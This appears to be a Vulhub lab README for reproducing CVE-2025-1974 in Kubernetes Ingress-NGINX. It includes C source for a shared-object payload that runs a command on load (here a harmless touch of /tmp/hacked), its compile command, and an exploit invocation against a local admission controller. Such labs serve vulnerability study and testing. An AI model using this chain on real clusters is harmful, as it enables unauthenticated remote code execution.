first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
61
ingress-nginx/CVE-2025-1974/README.md
Normal file
61
ingress-nginx/CVE-2025-1974/README.md
Normal file
@@ -0,0 +1,61 @@
|
||||
# Kubernetes Ingress-NGINX Unauthenticated Remote Code Execution (CVE-2025-1974)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Ingress-NGINX is an ingress controller for Kubernetes that uses NGINX as a reverse proxy and load balancer.
|
||||
|
||||
The "IngressNightmare" vulnerability (CVE-2025-1974) stems from a critical flaw in the Ingress-NGINX Admission Controller, a core Kubernetes security mechanism responsible for validating incoming Ingress resources. This controller is exposed over the network without requiring authentication, allowing attackers to craft malicious `AdmissionReview` requests and inject unauthorized configurations into Ingress resources. When chained with other vulnerabilities (CVE-2025-24514, CVE-2025-1097, or CVE-2025-1098), this can lead to remote code execution.
|
||||
|
||||
Some exploitable chains are known:
|
||||
|
||||
- CVE-2025-1974 + CVE-2025-24514: RCE via `auth-url` annotation injection
|
||||
- CVE-2025-1974 + CVE-2025-1097: RCE via `auth-tls-match-cn` annotation
|
||||
- CVE-2025-1974 + CVE-2025-1098: RCE via image UID abuse
|
||||
|
||||
References:
|
||||
|
||||
- <https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities>
|
||||
- <https://kubernetes.io/blog/2025/03/24/ingress-nginx-cve-2025-1974/>
|
||||
- <https://github.com/yoshino-s/CVE-2025-1974>
|
||||
- <https://github.com/Clifford-prog/IngressNightmare-PoC>
|
||||
- <https://github.com/kubernetes/ingress-nginx/blob/8c1ecd7655bd052a26e64d3361dede3096cd80c6/internal/ingress/controller/controller.go#L425>
|
||||
|
||||
## Environment Setup
|
||||
|
||||
To simulate the vulnerability, a K3s-based Kubernetes environment is used for simplicity:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
The script will wait for the Kubernetes API to be ready and for the ingress-nginx controller to start. Once the environment starts, Ingress-NGINX listens on ports 30080 and 30443 (TLS), and the Ingress-NGINX Admission Controller also reverse proxies to port 30443,for example `https://localhost:30443/networking/v1/ingresses`.
|
||||
|
||||
## Vulnerability Reproduction
|
||||
|
||||
First, a shared object (`.so`) payload matching the container's architecture needs to be compiled.
|
||||
|
||||
```c
|
||||
#include<stdio.h>
|
||||
#include<stdlib.h>
|
||||
|
||||
__attribute__((constructor)) static void reverse_shell(void)
|
||||
{
|
||||
system("touch /tmp/hacked");
|
||||
}
|
||||
```
|
||||
|
||||
Use the following command to compile the source code:
|
||||
|
||||
```
|
||||
gcc -shared -fPIC -o shell.so shell.c
|
||||
```
|
||||
|
||||
After compiling the source code above with the appropriate environment, use [exploit.py](exploit.py) to exploit the vulnerability:
|
||||
|
||||
```
|
||||
python exploit.py -a https://localhost:30443/networking/v1/ingresses -i http://localhost:30080/fake/addr -s shell.so
|
||||
```
|
||||
|
||||
The exploit works by forging an `AdmissionReview` request to inject an `ssl_engine` directive, which forces NGINX to load the malicious dynamic shared object. Upon successful exploitation, you should observe the creation of a `/tmp/hacked` file inside the ingress-nginx container.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user